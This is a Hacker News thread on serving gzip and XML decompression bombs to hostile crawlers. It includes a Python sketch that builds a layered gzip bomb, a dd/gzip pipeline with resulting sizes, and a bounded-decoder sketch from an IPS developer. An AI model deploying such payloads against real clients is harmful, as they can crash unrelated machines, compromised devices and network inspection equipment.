
Comment by colanderman

8 years ago

I would think Transfer-Encoding would be a better choice than Content-Encoding. It's processed at a lower level of the stack and must be decoded – Content-Encoding is generally only decoded if the client is specifically interested in whatever's inside the payload. (Note that you don't have to specify the large Content-Length in this case as it is implied by the transfer coding.)
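To make the distinction concrete, the two variants might look like this on the wire (a sketch only; the header values are illustrative, not taken from any real server):

    # Content-Encoding: the body is a gzip-compressed representation of the
    # resource; Content-Length is the length of the body as actually sent.
    with_content_encoding = (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: application/xml\r\n"
        b"Content-Encoding: gzip\r\n"
        b"Content-Length: 1073741824\r\n"
        b"\r\n"
    )

    # Transfer-Encoding: the body is gzip-coded for transport and is meant
    # to be decoded by the HTTP layer itself; no Content-Length is sent.
    with_transfer_encoding = (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: application/xml\r\n"
        b"Transfer-Encoding: gzip\r\n"
        b"\r\n"
    )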

Also worth trying is an XML bomb [1], though that's higher up the stack.

Of course you can combine all three in one payload (since it's more likely that lower levels of the stack implement streaming processing): gzip an XML bomb followed by a gigabyte of space characters, then gzip that followed by a gigabyte of NULs, then serve it up as application/xml with both Content-Encoding and Transfer-Encoding: gzip.
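Roughly, building that payload could look like this (a Python sketch; "bomb.xml" is a hypothetical pre-built billion-laughs file, and the layer/output filenames are made up):

    import gzip, shutil

    GIB = 1024 ** 3
    CHUNK = 1024 * 1024

    def append_fill(out, byte, total):
        # Stream `total` bytes of a single repeated byte into an open gzip file.
        block = byte * CHUNK
        for _ in range(total // CHUNK):
            out.write(block)

    # Layer 1: gzip(XML bomb + 1 GiB of spaces)
    with open("bomb.xml", "rb") as src, gzip.open("layer1.gz", "wb") as out:
        shutil.copyfileobj(src, out)
        append_fill(out, b" ", GIB)

    # Layer 2: gzip(layer1.gz + 1 GiB of NULs). Serve the result as
    # application/xml with both "Content-Encoding: gzip" and
    # "Transfer-Encoding: gzip".
    with open("layer1.gz", "rb") as src, gzip.open("payload.gz", "wb") as out:
        shutil.copyfileobj(src, out)
        append_fill(out, b"\x00", GIB)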

(Actually, now that I think of it, even though a terabyte of NULs compresses to 1 GiB [2], I bet that file is itself highly compressible, or could be made to be if it's handcrafted. You could probably serve that up easily with a file of just a few MiB using the above technique.)

EDIT: In fact a 100 GiB version of such a payload compresses down to ~160 KiB on the wire. (No, I won't be sharing it as I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.)

[1] https://en.wikipedia.org/wiki/Billion_laughs

[2] https://superuser.com/questions/139253/what-is-the-maximum-c...

> EDIT: In fact a 100 GiB version of such a payload compresses down to ~160 KiB on the wire. (No, I won't be sharing it as I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.)

http://www.aerasec.de/security/advisories/decompression-bomb... has a triple-gzipped 100 GB file down to 6 kB; the double-gzipped version is 230 kB.

I'm trying it on 1 TB, but it turns out to take some time.

  • > ... I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.

    Sure. But gzip bombs don't do substantial (if any) permanent damage. At most, they'd crash the system. And indeed, that might attract the attention of owners, who might then discover that their devices had been compromised.

  • You only get two gzips, not three :) (transfer and content codings)

    Unless you're serving up XML which is itself zipped, such as an Open Office document. But most clients won't be looking for that.

  • One useful trick is that, for gzip, d(z(x+y)) = d(z(x) + z(y)).

    So you don't need to compress the entire terabyte (a quick check follows this sub-thread).

    • I'd expect that to give a worse compression ratio, though it may not matter given the additional follow-up gzips.

      The compression finally finished after 3 h (on an old MBP): "dd if=/dev/zero bs=1m count=1m | gzip | gzip | gzip" yields a bit under 10 kB (10082 bytes), and adding a 4th gzip yields a bit under 4 kB (4004 bytes). A 5th gzip starts increasing the size of the archive.

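    The identity is easy to check, and it means the small compressed member can simply be repeated instead of compressing the whole terabyte (a Python sketch):

      import gzip

      member = gzip.compress(b"\x00" * (1024 * 1024))    # z(x): one MiB of NULs, compressed
      both = gzip.decompress(member + member)            # d(z(x) + z(x))
      assert both == b"\x00" * (2 * 1024 * 1024)         # == x + x

      # A ~1 TiB bomb is then just the small member repeated a million times:
      # bomb = member * (1024 * 1024)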

If you are clever, you can make your compressed files effectively infinite by turning them into quines: https://alf.nu/ZipQuine

  • It's unlikely any of the parsers would apply recursive decompression, so a ZipQuine isn't going to help exhaust resources.

    • Indeed. ZipQuines are not targeted against servers, but against middleware. More precisely, these try to attack certain kinds of "security scanners". Those security scanners want to unpack as much as possible, by design(!), otherwise bad code could hide behind yet another round of compressed container formats.


    • True. I wonder what's the largest file you can decompress to given some bound on the compressed result.

Most (all?) user-agents don't set the TE header (which specifies the transfer encodings the UA is willing to accept), so I doubt they would bother to decode unsolicited "Transfer-Encoding: gzip".

I wonder how these techniques play along with random IDS/IPS/deep packet inspection/WAF/AV/DLP/web cache/proxy/load balancer/etc. devices that happen to look/peek into traffic that passes through the network. I would wager my $ that more than a couple will need some admin(istrative) care after running some of this stuff through them.

And btw -- when you end up accidentally crashing/DoS'ing your corporate WAF or your ISP's DPI, who are they going to call?

  • I worked on an IPS a few years back. It was specifically designed NOT to inflate arbitrary ZIP files. All decoders worked in a streaming fashion and were limited to a fixed (low) nesting depth and preallocated memory. Typically they would be configured to reject traffic such as the payload we've been discussing.
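    Very roughly, that style of defensive decoder looks like this (a Python sketch with made-up limits, not the actual product code):

      import zlib

      MAX_OUTPUT = 10 * 1024 * 1024   # per-layer output budget (made up)
      MAX_DEPTH = 3                   # fixed nesting limit (made up)

      def bounded_gunzip(data: bytes, depth: int = 0) -> bytes:
          if depth >= MAX_DEPTH:
              raise ValueError("nesting limit exceeded")
          d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)   # gzip framing
          out = d.decompress(data, MAX_OUTPUT)                # capped inflate
          if d.unconsumed_tail:                               # hit the cap with input left over
              raise ValueError("output budget exceeded")
          if out[:2] == b"\x1f\x8b":                          # result is itself gzip: recurse one level
              return bounded_gunzip(out, depth + 1)
          return out

    (Single-member only, and buffered rather than streamed, for brevity; a real engine would work chunk by chunk.)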